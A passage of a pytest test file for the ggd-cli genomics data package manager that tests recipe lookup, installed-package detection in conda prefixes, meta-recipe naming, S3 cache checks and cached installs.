| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b75974c7a904e9e759536da979158aa41d27260e
| 119,005
|
py
|
Python
|
tests/test_install.py
|
gogetdata/ggd-cli
|
717d37643f3e29813f47eda68b9745459d9ef430
|
[
"MIT"
] | 29
|
2016-04-23T13:28:51.000Z
|
2021-10-03T15:49:29.000Z
|
tests/test_install.py
|
gogetdata/ggd-cli
|
717d37643f3e29813f47eda68b9745459d9ef430
|
[
"MIT"
] | 17
|
2016-04-22T15:45:33.000Z
|
2020-11-20T16:47:24.000Z
|
tests/test_install.py
|
gogetdata/ggd-cli
|
717d37643f3e29813f47eda68b9745459d9ef430
|
[
"MIT"
] | 2
|
2016-05-26T01:54:51.000Z
|
2020-04-30T19:17:18.000Z
|
from __future__ import print_function
import os
import sys
import subprocess as sp
import pytest
import yaml
import tempfile
import requests
import argparse
import json
import re
import time
import shutil
from copy import deepcopy
from argparse import Namespace
from argparse import ArgumentParser
import glob
import contextlib
import tarfile
import glob
from helpers import CreateRecipe, install_hg19_gaps_ucsc_v1, uninstall_hg19_gaps_ucsc_v1
from ggd import install
from ggd import utils
from ggd import uninstall
from ggd.utils import CondaEnvironmentNotFound
from ggd.utils import get_conda_package_list
from ggd.utils import ChecksumError
if sys.version_info[0] == 3:
from io import StringIO
elif sys.version_info[0] == 2:
from StringIO import StringIO
from conda.base.context import context
CONDA_ROOT = context.target_prefix
#---------------------------------------------------------------------------------------------------------
## enable socket
#---------------------------------------------------------------------------------------------------------
from pytest_socket import enable_socket
def pytest_enable_socket():
enable_socket()
#---------------------------------------------------------------------------------------------------------
## Test Label
#---------------------------------------------------------------------------------------------------------
TEST_LABEL = "ggd-install-test"
#---------------------------------------------------------------------------------------------------------
## IO redirection
#---------------------------------------------------------------------------------------------------------
## Create a redirect_stdout that works for python 2 and 3. (Similar to contextlib.redirect_stdout in python 3)
@contextlib.contextmanager
def redirect_stdout(target):
original = sys.stdout
sys.stdout = target
yield
sys.stdout = original
## Create a redirect_stderr that works for python 2 and 3. (Similar to contextlib.redirect_stderr in python 3)
@contextlib.contextmanager
def redirect_stderr(target):
original = sys.stderr
sys.stderr = target
yield
sys.stderr = original
#---------------------------------------------------------------------------------------------------------
## Unit Tests for ggd install
#---------------------------------------------------------------------------------------------------------
def remove_pfam():
"""
Helper script to setup install run
"""
## Uninstall pfam for later use
ggd_recipe = "hg19-pfam-domains-ucsc-v1"
if ggd_recipe in str(sp.check_output(["conda", "list"]).decode('utf8')):
try:
uninstall.uninstall((),Namespace(channel='genomics', command='uninstall', names=[ggd_recipe]))
sp.check_output(["conda", "uninstall", "-y", ggd_recipe])
except:
pass
def test_check_ggd_recipe_fake_recipe():
"""
Test the check_ggd_recipe function returns None if an invalide recipe is provided
"""
pytest_enable_socket()
remove_pfam()
assert install.check_ggd_recipe("Not_a_real_recipe","genomics") == None
def test_check_ggd_recipe_fake_channel():
"""
Test the check_ggd_recipe function exits if an invalide ggd channel is provided
"""
pytest_enable_socket()
with pytest.raises(SystemExit) as pytest_wrapped_e:
install.check_ggd_recipe("hg19-gaps-ucsc-v1","ggd-fake-channel")
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
assert pytest_wrapped_e.match("The 'ggd-fake-channel' channel is not a ggd conda channel") ## Check that the exit code is 1
def test_check_ggd_recipe_good_run():
"""
Test the check_ggd_recipe function returns a dict with information from the recipe
"""
pytest_enable_socket()
tmp_recipe = "hg19-gaps-ucsc-v1"
jdict = install.check_ggd_recipe(tmp_recipe,"genomics")
assert type(jdict) == type(dict())
assert jdict["packages"][tmp_recipe]
assert jdict["packages"][tmp_recipe]["identifiers"]["species"] == "Homo_sapiens"
assert jdict["packages"][tmp_recipe]["identifiers"]["genome-build"] == "hg19"
def test_check_if_installed_recipe_not_installed():
    """
    Test if the check_if_installed function correctly identifies that the ggd data package is not installed.
    """
    pytest_enable_socket()
    recipe = "Fake_hg19-gaps"
    ## Hand-built channel metadata for a package that is never installed,
    ##  so check_if_installed() can be exercised without a real package.
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
                    {u'activate.d': False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics',
                    u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
                    {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                    u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'hg19', u'species': u'Homo_sapiens'}}}}
    ## No share/ggd/<species>/<build>/<recipe>/<version> dir exists -> False
    assert install.check_if_installed(recipe,ggd_jdict) == False
def test_check_if_installed_recipe_is_installed():
    """
    Test if the check_if_installed function correctly identifies that the ggd data package is installed.

    Creates the expected share/ggd/<species>/<build>/<recipe>/<version>
    directory (if missing) so that check_if_installed() sees the package as
    installed, then removes the directory again if this test created it.
    """
    pytest_enable_socket()
    recipe = "hg19-gaps-ucsc-v1"
    ## Hand-built channel metadata matching the real hg19-gaps-ucsc-v1 pkg
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                    u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'hg19', u'species': u'Homo_sapiens'}}}}
    species = ggd_jdict["packages"][recipe]["identifiers"]["species"]
    build = ggd_jdict["packages"][recipe]["identifiers"]["genome-build"]
    version = ggd_jdict["packages"][recipe]["version"]
    CONDA_ROOT = utils.conda_root()
    path = os.path.join(CONDA_ROOT,"share","ggd",species,build,recipe,version)
    ## Create the install dir if it does not exist; remember whether we made it
    path_added = False
    if not glob.glob(path):
        os.makedirs(path)
        path_added = True
    ## If a package is installed, check_if_installed returns True
    assert install.check_if_installed(recipe,ggd_jdict) == True
    if path_added:
        os.rmdir(path) ## Remove the bottom directory from the path if it was created.
def test_check_if_installed_with_prefix_set():
    """
    Test that ggd can identify if a data package has been installed in a different (targeted) conda environment.

    Creates a throw-away conda env ("temp_env"), verifies that an
    uninstalled package is reported as not installed there, installs a real
    package into that prefix, verifies it is then detected (and that no
    files leaked into the current conda root), and finally deletes the env.
    """
    pytest_enable_socket()
    ## Temp conda environment
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_env")
    ### Remove temp env if it already exists
    sp.check_output(["conda", "env", "remove", "--name", "temp_env"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    ### Create the temp environment
    sp.check_output(["conda", "create", "--name", "temp_env"])
    ## Check that an uninstalled data package is correctly stated as such
    recipe = "Fake_hg19-gaps"
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
                    {u'activate.d': False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics',
                    u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
                    {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                    u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'hg19', u'species': u'Homo_sapiens'}}}}
    assert install.check_if_installed(recipe,ggd_jdict,prefix=temp_env) == False
    ## Check that an installed data package is stated as such
    ggd_package = "hg19-pfam-domains-ucsc-v1"
    sp.check_output(["ggd", "install", "--prefix", temp_env, ggd_package])
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-pfam-domains-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'16-Apr-2017'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/hg19-pfam-domains-ucsc-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'pfam', u'domains',u'protein',u'protein-domains',u'UCSC',u'bed',u'bed-file'],
                    u'summary': u'Pfam domain annotation in bed12 format. (From UCSC)', u'text_prefix': False,
                    u'identifiers': {u'genome-build': u'hg19', u'species': u'Homo_sapiens'}}}}
    species = ggd_jdict["packages"][ggd_package]["identifiers"]["species"]
    build = ggd_jdict["packages"][ggd_package]["identifiers"]["genome-build"]
    version = ggd_jdict["packages"][ggd_package]["version"]
    ## If a package is installed, check_if_installed returns True
    assert install.check_if_installed(ggd_package,ggd_jdict,prefix=temp_env) == True
    ## The data files must exist in the temp env prefix ...
    file1 = "{}.bed12.bed.gz".format(ggd_package)
    file2 = "{}.bed12.bed.gz.tbi".format(ggd_package)
    assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file1))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file2))
    ## ... and must NOT have leaked into the current conda root
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file1)) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file2)) == False
    ## Remove temp env
    sp.check_output(["conda", "env", "remove", "--name", "temp_env"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    assert os.path.exists(temp_env) == False
def test_check_conda_installation_pacakge_no_installed():
    """
    Check that check_conda_installation() reports a non-existent data package as not installed by conda.
    """
    pytest_enable_socket()
    fake_recipe = "Fake-hg19-gaps"
    fake_version = "1"
    ## A made-up package name should never appear in the conda package list
    assert install.check_conda_installation(fake_recipe, fake_version) == False
def test_check_conda_installation_pacakge_is_installed():
    """
    Test check conda installation function correctly identifies that a data package has been installed by conda.
    This method calls the install_hg19_gaps to run.
    """
    pytest_enable_socket()
    ## Install hg19-gaps-ucsc-v1
    recipe = "hg19-gaps-ucsc-v1"
    args = Namespace(channel='genomics', command='install', debug=False, name=[recipe], file=[] , prefix=None, id = None)
    try:
        install.install((), args)
    except SystemExit:
        pass
    ## Test that it is already installed: for an installed package,
    ##  check_conda_installation exits via sys.exit()
    ## (removed an unused jdict/version lookup that made a needless network call)
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.check_conda_installation(recipe)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    ## Best-effort cleanup; narrow except so SystemExit/KeyboardInterrupt propagate
    try:
        uninstall_hg19_gaps_ucsc_v1()
    except Exception:
        pass
def test_check_conda_installation_pacakge_no_installed_longer_package_name():
    """
    Check that check_conda_installation() does not mistake a longer, similar package name for an installed package.
    """
    pytest_enable_socket()
    ## "hg19-gapsss-ucsc-v1" is a superstring of the real "hg19-gaps-ucsc-v1"
    longer_name = "hg19-gapsss-ucsc-v1"
    assert install.check_conda_installation(longer_name) == False
def test_check_conda_installation_pacakge_no_installed_shorter_package_name():
    """
    Check that check_conda_installation() does not mistake a shorter, similar package name for an installed package.
    """
    pytest_enable_socket()
    ## "hg19-ga" is a prefix of the real "hg19-gaps-ucsc-v1"
    shorter_name = "hg19-ga"
    assert install.check_conda_installation(shorter_name) == False
def test_check_conda_installed_with_prefix_set():
    """
    Test that an installed data package designated by the prefix flag can be detected by conda.

    Creates a throw-away conda env ("temp_env2"), verifies the package is
    first reported as not installed there, installs it into that prefix,
    verifies check_conda_installation() then exits (already-installed path),
    checks no files leaked into the current conda root, and removes the env.
    """
    pytest_enable_socket()
    ## Temp conda environment
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_env2")
    ### Remove temp env if it already exists
    sp.check_output(["conda", "env", "remove", "--name", "temp_env2"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    ### Create the temp environment
    sp.check_output(["conda", "create", "--name", "temp_env2"])
    ## Check that an uninstalled package in a specific prefix is properly identified
    ggd_package = "hg19-pfam-domains-ucsc-v1"
    ## Hand-built channel metadata used below to locate the installed files
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-pfam-domains-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'16-Apr-2017'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/hg19-pfam-domains-ucsc-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'pfam', u'domains',u'protein',u'protein-domains',u'UCSC',u'bed',u'bed-file'],
                    u'summary': u'Pfam domain annotation in bed12 format. (From UCSC)', u'text_prefix': False,
                    u'identifiers': {u'genome-build': u'hg19', u'species': u'Homo_sapiens'}}}}
    assert install.check_conda_installation(ggd_package,prefix=temp_env) == False
    ## Check that an installed data package is stated as such
    sp.check_output(["ggd", "install", "--prefix", temp_env, ggd_package])
    species = ggd_jdict["packages"][ggd_package]["identifiers"]["species"]
    build = ggd_jdict["packages"][ggd_package]["identifiers"]["genome-build"]
    version = ggd_jdict["packages"][ggd_package]["version"]
    ## For an already-installed package, check_conda_installation exits
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.check_conda_installation(ggd_package,prefix=temp_env)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    ## The data files must exist in the temp env prefix ...
    file1 = "{}.bed12.bed.gz".format(ggd_package)
    file2 = "{}.bed12.bed.gz.tbi".format(ggd_package)
    assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file1))
    assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,ggd_package,version,file2))
    ## ... and must NOT have leaked into the current conda root
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file1)) == False
    assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,ggd_package,version,file2)) == False
    ## Remove temp env
    sp.check_output(["conda", "env", "remove", "--name", "temp_env2"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    assert os.path.exists(temp_env) == False
def test_get_idname_from_metarecipe():
    """
    Method to test if the get_idname_from_metarecipe() correctly returns the right name.

    Covers four cases: upper-case accession id (case preserved), lower-case
    accession id, mixed-case accession id, a non-standard data-provider tag
    (lower-cased in the result), and a non-standard version string (used
    verbatim after the "v").
    """
    ## Case 1: upper-case accession id is preserved as-is
    accession_id = "GSE123"
    meta_recipe = "meta-recipe-geo-accession-geo-v1"
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                    u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'meta-recipe', u'species': u'meta-recipe'}}}}
    new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
    ## This method does not change case
    assert new_name != "gse123-geo-v1"
    assert new_name == "GSE123-geo-v1"
    ## Case 2: lower-case accession id is preserved as-is
    accession_id = "gds456"
    meta_recipe = "meta-recipe-geo-accession-geo-v1"
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                    u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'meta-recipe', u'species': u'meta-recipe'}}}}
    new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
    ## This method does not change case
    assert new_name == "gds456-geo-v1"
    ## Case 3: mixed-case accession id is preserved as-is
    accession_id = "GsM99890"
    meta_recipe = "meta-recipe-geo-accession-geo-v1"
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'', u'data-provider': u'GEO'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                    u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'meta-recipe', u'species': u'meta-recipe'}}}}
    new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
    ## This method does not change case
    assert new_name == "GsM99890-geo-v1"
    ## Case 4: the data-provider tag is lower-cased in the generated name
    accession_id = "GsM99890"
    meta_recipe = "meta-recipe-geo-accession-geo-v1"
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'', u'data-provider': u'THE-DATA-PROVIDER'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                    u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'meta-recipe', u'species': u'meta-recipe'}}}}
    new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
    ## Test that the data provider is changed to lower case
    assert new_name == "GsM99890-the-data-provider-v1"
    ## Case 5: the package's version string is used verbatim after the "v"
    accession_id = "GsM99890"
    meta_recipe = "meta-recipe-geo-accession-geo-v1"
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'meta-recipe-geo-accession-geo-v1': {u'activate.d':
                    False, u'version': u'THE-VERSION', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'', u'data-provider': u'geo'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/meta-recipe-geo-accession-geo-v1-1-0.tar.bz2', u'pre_link': False, u'keywords': [u'GEO', u'Gene Expression Omnibus'],
                    u'summary': u'GEO Meta-Recipe', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'meta-recipe', u'species': u'meta-recipe'}}}}
    new_name = install.get_idname_from_metarecipe(accession_id, meta_recipe, ggd_jdict)
    ## Test that the version is properly used
    assert new_name == "GsM99890-geo-vTHE-VERSION"
def test_check_S3_bucket_not_uploaded():
    """
    Test if a recipe is cached on s3 or not.

    check_S3_bucket() must return False in all three negative cases: no
    "tags" key at all, a "tags" key without "cached", and a "cached" list
    that lacks the "uploaded_to_aws" signature.
    """
    pytest_enable_socket()
    recipe = "hg19-gaps-ucsc-v1"
    ## If no tags key avaible return false
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'post_link': True, u'binary_prefix': False, u'run_exports': {},
                    u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                    u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'hg19', u'species': u'Homo_sapiens'}}}}
    assert install.check_S3_bucket(recipe, ggd_jdict) == False
    ## If not cached key in tags return false
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'ggd-channel': u'genomics', u'data-version': u'27-Apr-2009'},
                    u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink': False, u'subdirs':
                    [u'noarch'], u'deactivate.d': False, u'reference_package': u'noarch/hg19-gaps-v1-1-1.tar.bz2',
                    u'pre_link': False, u'keywords': [u'gaps', u'region'], u'summary': u'Assembly gaps from USCS',
                    u'text_prefix': False, u'identifiers': {u'genome-build': u'hg19', u'species':
                    u'Homo_sapiens'}}}}
    assert install.check_S3_bucket(recipe, ggd_jdict) == False
    ## If no "uploaded_to_aws" Signature in cached return false
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [], u'ggd-channel': u'genomics', u'data-version':
                    u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports': {}, u'pre_unlink':
                    False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                    u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'hg19', u'species': u'Homo_sapiens'}}}}
    assert install.check_S3_bucket(recipe, ggd_jdict) == False
def test_check_S3_bucket_is_uploaded():
    """
    Test if a recipe is cached on s3 or not.

    check_S3_bucket() must return True when the "cached" tag list contains
    the "uploaded_to_aws" signature.
    """
    pytest_enable_socket()
    recipe = "hg19-gaps-ucsc-v1"
    ## Return True if uploaded to aws
    ggd_jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'hg19-gaps-ucsc-v1': {u'activate.d':
                    False, u'version': u'1', u'tags': {u'cached': [u'uploaded_to_aws'], u'ggd-channel': u'genomics',
                    u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
                    {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                    u'noarch/hg19-gaps-v1-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                    u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                    u'hg19', u'species': u'Homo_sapiens'}}}}
    assert install.check_S3_bucket(recipe, ggd_jdict) == True
def test_install_from_cache():
    """
    Test install from cache function for proper installation from cached recipe.

    First verifies that a fake (non-existent) package causes a SystemExit,
    then installs a real cached recipe and checks the ggd_info metadata
    (noarch tarball + channeldata.json) is updated; finally repeats with a
    list of two recipes and uninstalls everything that was installed.
    """
    pytest_enable_socket()
    ## Bad install: the recipe does not actually exist on the channel
    name = "Fake_hg19-gaps"
    ggd_channel = "genomics"
    jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
                {u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
                u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
                {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                u'hg19', u'species': u'Homo_sapiens'}}}}
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.install_from_cached([name], ggd_channel,jdict)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    ## Good Install
    name = "hg19-cpg-islands-ucsc-v1"
    ggd_channel = "genomics"
    jdict = install.check_ggd_recipe(name,ggd_channel)
    ## install_from_cached reads CONDA_SOURCE_PREFIX from the environment
    os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
    assert install.install_from_cached([name], ggd_channel,jdict) == True
    ### Test that the ggd_info metadata is updated with ggd pkg
    pkg_info = get_conda_package_list(utils.conda_root(),name)
    assert name in pkg_info.keys()
    version = pkg_info[name]["version"]
    build = pkg_info[name]["build"]
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
    assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
    with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
        channeldata = json.load(jfile)
        assert name in channeldata["packages"]
    ## Best-effort uninstall of the single package before the multi-pkg run
    try:
        args = Namespace(channel='genomics', command='uninstall', names=[name])
        uninstall.uninstall((),args)
    except:
        pass
    ## Test with multiple in the list
    ggd_recipes = ["grch37-chromsizes-ggd-v1","hg19-chromsizes-ggd-v1"]
    assert install.install_from_cached(ggd_recipes, ggd_channel,jdict) == True
    for name in ggd_recipes:
        pkg_info = get_conda_package_list(utils.conda_root(),name)
        version = pkg_info[name]["version"]
        build = pkg_info[name]["build"]
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch"))
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","noarch",name+"-{}-{}.tar.bz2".format(version,build)))
        assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json"))
        with open(os.path.join(utils.conda_root(),"share","ggd_info","channeldata.json")) as jfile:
            channeldata = json.load(jfile)
            assert name in channeldata["packages"]
    ## Clean up: uninstall the two recipes installed above
    for name in ggd_recipes:
        args = Namespace(channel='genomics', command='uninstall', names=[name])
        assert uninstall.uninstall((),args) == True
def test_install_from_cache_with_prefix_set():
    """
    Test install from cache function for proper installation from cached recipe
    into a different conda prefix.

    Creates a throw-away conda env ("temp_env3"), checks a fake recipe exits
    with SystemExit, installs a real cached recipe into the env, verifies
    the data files, conda pkgs dir, and ggd_info metadata landed in the env
    (and not in the current conda root), then removes the env.
    """
    pytest_enable_socket()
    ## Temp conda environment
    temp_env = os.path.join(utils.conda_root(), "envs", "temp_env3")
    ### Remove temp env if it already exists
    sp.check_output(["conda", "env", "remove", "--name", "temp_env3"])
    try:
        shutil.rmtree(temp_env)
    except Exception:
        pass
    ### Create the temp environment
    sp.check_output(["conda", "create", "--name", "temp_env3"])
    ## Bad install: the recipe does not actually exist on the channel
    name = "Fake_hg19-gaps"
    ggd_channel = "genomics"
    jdict = {u'channeldata_version': 1, u'subdirs': [u'noarch'], u'packages': {u'Fake_hg19-gaps':
                {u'activate.d': False, u'version': u'1', u'tags': {u'cached': ["uploaded_to_aws"], u'ggd-channel': u'genomics',
                u'data-version': u'27-Apr-2009'}, u'post_link': True, u'binary_prefix': False, u'run_exports':
                {}, u'pre_unlink': False, u'subdirs': [u'noarch'], u'deactivate.d': False, u'reference_package':
                u'noarch/Fake-hg19-gaps-1-1.tar.bz2', u'pre_link': False, u'keywords': [u'gaps', u'region'],
                u'summary': u'Assembly gaps from USCS', u'text_prefix': False, u'identifiers': {u'genome-build':
                u'hg19', u'species': u'Homo_sapiens'}}}}
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        install.install_from_cached([name], ggd_channel,jdict,prefix=temp_env)
    assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
    ## Good install
    name = "hg19-pfam-domains-ucsc-v1"
    ggd_channel = "genomics"
    jdict = install.check_ggd_recipe(name,ggd_channel)
    ## install_from_cached reads CONDA_SOURCE_PREFIX from the environment
    os.environ["CONDA_SOURCE_PREFIX"] = utils.conda_root()
    assert install.install_from_cached([name], ggd_channel,jdict,prefix=temp_env) == True
    species = jdict["packages"][name]["identifiers"]["species"]
    build = jdict["packages"][name]["identifiers"]["genome-build"]
    version = jdict["packages"][name]["version"]
    ## The data files must exist in the temp env prefix, not the conda root
    file1 = "{}.bed12.bed.gz".format(name)
    file2 = "{}.bed12.bed.gz.tbi".format(name)
    assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
